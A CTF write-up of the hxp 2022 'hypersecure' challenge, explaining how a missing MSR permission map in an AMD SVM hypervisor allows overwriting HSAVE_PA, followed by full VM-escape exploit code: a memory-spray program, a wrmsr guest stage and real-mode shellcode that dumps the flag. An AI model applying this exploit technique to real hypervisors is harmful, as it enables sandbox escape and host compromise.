hxp CTF 2022: hypersecure writeup

The challenge implements a hypervisor (HV) based on AMD SVM 1 to sandbox a 4KiB program. The goal is to escape the sandbox (a VM escape) and then read the flag.

Let’s briefly go through the HV implementation. At a high level, the module creates a VM context at load time, receives a 4KiB raw binary from userspace, and then executes it from within the sandbox.

For context creation, the HV sets up the two-stage translation tables, the Guest Page Table (GPT) and the Nested Page Table (NPT), where the GPT is controlled by the VM and the NPT only by the hypervisor. The NPT maps 4 x 4KiB of Host Physical Memory into the Guest Physical Address space. The GPT maps 2MiB of contiguous Guest Physical Memory, but only the first 16KiB is accessible; touching the rest causes an NPT fault.
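To make the two-stage picture concrete, here is a minimal sketch that classifies a guest access. It assumes the GPT identity-maps guest virtual to guest physical addresses and that the NPT-backed window starts at guest physical address 0; neither detail is stated above, and the names are made up for illustration.

```c
#include <assert.h>
#include <stdint.h>

#define PAGE_SIZE        0x1000ULL
#define NPT_BACKED_PAGES 4ULL          /* 4 x 4KiB backed by host memory */
#define GPT_MAPPED_BYTES (2ULL << 20)  /* 2MiB mapped by the guest page table */

static_assert(NPT_BACKED_PAGES * PAGE_SIZE == 0x4000, "16KiB window");

typedef enum {
    ACCESS_OK,               /* both translation stages succeed */
    ACCESS_NPT_FAULT,        /* GPT maps it, NPT does not: exit to the HV */
    ACCESS_GUEST_PAGE_FAULT  /* not mapped by the GPT at all */
} access_result;

/* Hypothetical helper: assumes an identity-mapped GPT and an NPT window
 * that begins at guest physical address 0. */
static access_result classify_guest_access(uint64_t guest_addr) {
    if (guest_addr >= GPT_MAPPED_BYTES)
        return ACCESS_GUEST_PAGE_FAULT;
    if (guest_addr >= NPT_BACKED_PAGES * PAGE_SIZE)
        return ACCESS_NPT_FAULT;
    return ACCESS_OK;
}
```

Under these assumptions, the first stage loaded at 0x3000 sits in the last backed page, and anything from 0x4000 upwards traps to the HV.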

The HV sets up the Virtual Machine Control Block (VMCB), which contains the Control Area and the Save Area. The Control Area tells the CPU firmware what the HV needs for correct and secure virtualization of the VM. This includes information opaque to the VM: which instructions or state changes must be intercepted by the HV, exit information on VM-exit, TSC management, the pointer to the NPT, etc. The Save Area contains the CPU context state that is loaded on entering the VM, and it is also where the VM state is stored on exiting the VM. It holds RAX, …, RIP, …, CR0, …, the segment registers, etc.
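As a rough illustration of that split, the sketch below treats the VMCB as a raw 4KiB page and pokes a few Save Area fields by offset. The offsets are quoted from memory of the AMD manual and the Linux struct vmcb_save_area layout, so treat them as assumptions to check against the manual; the helper names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define VMCB_SIZE      0x1000u
#define VMCB_SAVE_AREA 0x400u  /* Control Area: 0x000-0x3ff, Save Area after it */

/* Offsets relative to the start of the Save Area (assumed, see lead-in). */
#define SAVE_CR0 0x158u
#define SAVE_RIP 0x178u
#define SAVE_RAX 0x1f8u

/* Store a 64-bit value into a Save Area field of a raw VMCB page. */
static void vmcb_save_write64(uint8_t *vmcb, uint32_t save_off, uint64_t value) {
    assert(VMCB_SAVE_AREA + save_off + sizeof(value) <= VMCB_SIZE);
    memcpy(vmcb + VMCB_SAVE_AREA + save_off, &value, sizeof(value));
}

/* Load a 64-bit value from a Save Area field of a raw VMCB page. */
static uint64_t vmcb_save_read64(const uint8_t *vmcb, uint32_t save_off) {
    uint64_t value;
    assert(VMCB_SAVE_AREA + save_off + sizeof(value) <= VMCB_SIZE);
    memcpy(&value, vmcb + VMCB_SAVE_AREA + save_off, sizeof(value));
    return value;
}
```

With this layout, RIP lives at page offset 0x578 and RAX at 0x5f8.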

Similarly, when the VM is entered, the HV’s state is stored into an area called HSAVE, pointed to by the HSAVE_PA MSR, and it is reloaded from there on VM-exit. The format of the HSAVE area is implementation-defined, but QEMU reuses the same format as the VMCB Save Area 3.

When setting up the Control Block, the HV marks instructions for interception: hlt, vmmcall, vmrun, IO access, MSR access, etc. If IO access were allowed, the VM could potentially attack the HV via some device, read the flag off disk, etc. To prevent this, the HV sets up a block of memory, the IO Permission Map (IOPM), and writes the block’s physical address into the IOPM_BASE_PA field. Each bit specifies whether the corresponding IO port is intercepted. All bits are set, and thus all IO operations are intercepted.
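The one-bit-per-port lookup can be sketched as follows. This is only an illustration of the bitmap idea, not the challenge's code: the 12KiB size is what the AMD manual gives for the IOPM as far as I recall, and the function names are made up.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

#define IOPM_SIZE 0x3000u  /* assumed 12KiB map, one bit per IO port */

/* Mark every port as intercepted, as the HV in this challenge does. */
static void iopm_intercept_all(uint8_t *iopm) {
    memset(iopm, 0xff, IOPM_SIZE);
}

/* A set bit means an access to that port exits to the HV. */
static bool iopm_intercepts(const uint8_t *iopm, uint16_t port) {
    return (iopm[port / 8] >> (port % 8)) & 1;
}
```

With the map filled by iopm_intercept_all, a guest write to the serial port at 0x3f8 would trap instead of reaching the device.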

One of the bugs in the hypervisor is in Model Specific Register (MSR) interception. While it sets the MSR_PROT_INTERCEPT flag in the VMCB, it never sets the MSRPM_BASE_PA value, which means that the firmware will use the 8KiB starting at Host Physical Address 0 as the MSR Permission Map. This region is reserved for IO, but QEMU still honors the bits it reads there when the region is used as the MSR Permission Map. The bits in this memory range are NOT all zeroes, but they are mostly zeroes, which leaves a wide range of MSRs accessible to the VM.
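To see which bit decides the fate of a given MSR, here is a small sketch of the permission map lookup. It assumes the layout described in the AMD manual as I remember it: two bits per MSR (read, then write) and three 2KiB vectors covering MSRs from 0x00000000, 0xC0000000 and 0xC0010000. The helper names are hypothetical.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

typedef struct {
    bool covered;       /* false: MSR lies outside the mapped ranges */
    uint32_t byte_off;  /* byte offset from MSRPM_BASE_PA */
    uint8_t read_bit;   /* bit index of the read-intercept bit */
    uint8_t write_bit;  /* bit index of the write-intercept bit */
} msrpm_slot;

/* Locate the two permission bits for an MSR (assumed layout, see lead-in). */
static msrpm_slot msrpm_locate(uint32_t msr) {
    static const struct { uint32_t base, vec_off; } ranges[] = {
        {0x00000000u, 0x0000u}, {0xC0000000u, 0x0800u}, {0xC0010000u, 0x1000u},
    };
    msrpm_slot s = {false, 0, 0, 0};
    for (size_t i = 0; i < sizeof(ranges) / sizeof(ranges[0]); i++) {
        uint32_t idx = msr - ranges[i].base;  /* wraps if msr < base */
        if (idx < 0x2000u) {
            uint32_t bit = idx * 2;
            s.covered = true;
            s.byte_off = ranges[i].vec_off + bit / 8;
            s.read_bit = (uint8_t)(bit % 8);
            s.write_bit = (uint8_t)(bit % 8 + 1);
            return s;
        }
    }
    return s;
}

/* MSRs outside the mapped ranges are treated as always intercepted. */
static bool msrpm_write_intercepted(const uint8_t *msrpm, uint32_t msr) {
    msrpm_slot s = msrpm_locate(msr);
    if (!s.covered)
        return true;
    return (msrpm[s.byte_off] >> s.write_bit) & 1;
}
```

For HSAVE_PA (0xC0010117) this lands on byte 0x1045, bit 7. With the map read from Host Physical Address 0, the write goes through whenever that single bit in low memory happens to be zero.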

This is a severe security bug because MSRs control hardware state, and access to them can lead to easy VM escapes. MSRs are mostly architecture-dependent, and not all of them are documented. For reference, here are the publicly known MSRs from AMD 4.

Now, how to pwn?

There’s surely more than one way to do it, but the author’s exploit relies on overwriting the HSAVE_PA MSR so that a forged HV state is loaded when the VM exits. Since the HSAVE area contains all of the CPU context register state, the attacker would be in full control of the HV.

For a successful exploit, the attacker needs to ensure two things: that the memory pointed to by HSAVE_PA is attacker controlled, and that the HV is restored into a valid state after VM-exit.

For the latter, the forged VMCB could be set up to operate in real mode, and the payload could be embedded into the VMCB page itself, since we know the physical address of the crafted VMCB. While in real mode, the code can still use 32-bit operands and addressing via the 0x66 and 0x67 instruction prefixes. All that is necessary is to find the flag in physical memory (rootfs) and then print it out via IO (no longer intercepted).

Ok, but how do we ensure that the new HSAVE_PA points to a controlled page? Spray physical memory by mmap-ing a lot of memory and copying the exact same pattern into each page. The exploit succeeds most of the time because most of memory is still free this early after boot.
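When debugging the spray, one way to check whether a sprayed page really landed on the target physical address is to decode its /proc/self/pagemap entry. This is not part of the author's exploit, just a sketch: it assumes a Linux guest where the process may see PFNs (which needs CAP_SYS_ADMIN), and the helper names are made up.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define PAGE_SHIFT  12
#define PM_PFN_MASK ((1ULL << 55) - 1)  /* bits 0-54: page frame number */
#define PM_PRESENT  (1ULL << 63)        /* bit 63: page is present in RAM */

/* Decode one 64-bit pagemap entry into a physical address.
 * Returns false if the page is not present or the PFN is hidden (zero). */
static bool pagemap_entry_to_pa(uint64_t entry, uint64_t *pa) {
    if (!(entry & PM_PRESENT))
        return false;
    uint64_t pfn = entry & PM_PFN_MASK;
    if (pfn == 0)
        return false;
    *pa = pfn << PAGE_SHIFT;
    return true;
}

/* True if the entry describes the page at the given physical address. */
static bool pagemap_entry_hits(uint64_t entry, uint64_t target_pa) {
    uint64_t pa;
    return pagemap_entry_to_pa(entry, &pa) && pa == target_pa;
}
```

The entry for a virtual address is the 8-byte value at file offset (vaddr / 4096) * 8 in /proc/self/pagemap. A hit for 0x8000000 on any sprayed page means the forged state is in place.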

Userspace program:

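#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/mman.h>

// struct hypersecure_vmcb comes from the hypervisor sources; first_stage_bin,
// second_stage_bin and second_stage_bin_len are the assembled stages below,
// embedded as byte arrays (their headers are not shown here).

#define NEW_HSAVE_PA 0x8000000
#define PAYLOAD_OFF 0x600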

static void write_vmcb(void *data) {
        memset(data, 0, 0x1000);
        struct hypersecure_vmcb *vmcb = (struct hypersecure_vmcb *)data;
        _Static_assert(sizeof(*vmcb) <= 0x1000, "aha");
        vmcb->save.rip = NEW_HSAVE_PA + PAYLOAD_OFF;
}

static void write_second_stage(void *data) {
        memcpy(data, second_stage_bin, second_stage_bin_len);
}

int main() {
        int hyper_secure_fd;
        int ret;
        // Spray physical memory with fake VMCBs.
        size_t sz = 1024 * 1024 * 150;
        void *data = mmap(0, sz, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
        if (data == MAP_FAILED) {
                fprintf(stderr, "failed to map memory\n");
                return -1;
        }
        for (size_t i = 0; i < sz; i += 0x1000) {
                write_vmcb((unsigned char *)data + i);
                write_second_stage((unsigned char *)data + i + PAYLOAD_OFF);
        }
        if ((hyper_secure_fd = open("/dev/hypersecure", O_RDWR)) < 0) {
                fprintf(stderr, "Failed to open hyper-secure connection\n");
                exit(-1);
        }
        // Load blob and run sandbox.
        if ((ret = ioctl(hyper_secure_fd, 0x1337, first_stage_bin)) < 0) {
                fprintf(stderr, "Failed to load and run: %d. Errno: %d\n", ret, errno);
                exit(-1);
        }
        return 0;
}

First stage in VM:

[BITS 64]
[ORG 0x3000]

; Overwrite the HSAVE_PA MSR: writes to it are not intercepted at all.
; wrmsr writes EDX:EAX, so clear the high half explicitly.
mov ecx, 0xc0010117
mov eax, 0x8000000
xor edx, edx
wrmsr

; Force a VM-exit so that the "CPU" restores the host state from the new HSAVE_PA, which we control
hlt

Second stage after escape:

[BITS 16]
[ORG 0x8000600]

mov edi, 0x8000
mov esi, .third_stage

; Avoid relative jumps because the address past 16 bits is cut off.
%rep 80
mov eax, [esi]
mov [edi], eax
add esi, 4
add edi, 4
%endrep

; jump to final stage
mov edi, 0x8000
jmp edi

; I couldn't figure out how to do a relative jump with extended addressing.
; The code below is just copied over to 0x8000, where it can comfortably
; search for the flag and print it out.

.third_stage:
; A reasonable physical start address
mov esi, 0x2000000

.loop:
mov eax, [esi]
cmp eax, 0x7b707868
je .done
add esi, 0x1000
cmp esi, 0x3000000
jl .loop

.done:

; print flag to serial
mov ecx, 0x40
.print:
xor eax, eax
mov al, [esi]
mov edx, 0x3f8
out dx, al
inc esi
loop .print

; shutdown
hlt

The hypervisor project is really a fork of my dumb hobby technical project 2.